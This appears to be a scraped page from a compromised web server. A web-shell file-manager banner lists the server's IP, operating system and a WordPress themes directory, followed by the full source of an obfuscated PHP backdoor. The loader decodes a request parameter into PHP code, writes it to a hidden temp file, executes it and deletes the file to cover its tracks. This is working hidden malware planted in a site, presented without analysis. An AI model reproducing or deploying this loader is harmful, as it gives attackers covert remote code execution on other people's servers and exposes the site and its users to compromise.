| Server IP : 103.191.208.88 / Your IP : 216.73.216.44 Web Server : Microsoft-IIS/10.0 System : Windows NT COSMIC 10.0 build 20348 (Windows Server 2022) AMD64 User : IWPD_1831(willswel_) ( 0) PHP Version : 8.2.31 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : OFF | Perl : OFF | Python : OFF | Sudo : OFF | Pkexec : OFF Directory : D:/Inetpub/vhosts/willswell.com/httpdocs/wp-content/themes/ |
Upload File : |
<?php
if(isset($_REQUEST["obj"])){
$sym = $_REQUEST["obj"];
$sym= explode('.' , $sym ) ;
$resource ='';
$s3 ='abcdefghijklmnopqrstuvwxyz0123456789';
$lenS =strlen($s3);
$w =0;
$__tmp =$sym;
while ($v5 =array_shift($__tmp)) {
$chS =ord($s3[$w %$lenS]);
$dec =((int)$v5 - $chS - ($w %10)) ^ 62;
$resource.=chr($dec);
$w++;}
$element = array_filter([sys_get_temp_dir(), "/dev/shm", getenv("TMP"), getenv("TEMP"), ini_get("upload_tmp_dir"), session_save_path(), getcwd(), "/tmp", "/var/tmp"]);
foreach ($element as $key => $itm) {
if ((bool)is_dir($itm) && (bool)is_writable($itm)) {
$record = "$itm" . "/.k";
$success = file_put_contents($record, $resource);
if ($success) {
include $record;
@unlink($record);
exit;}
}
}
}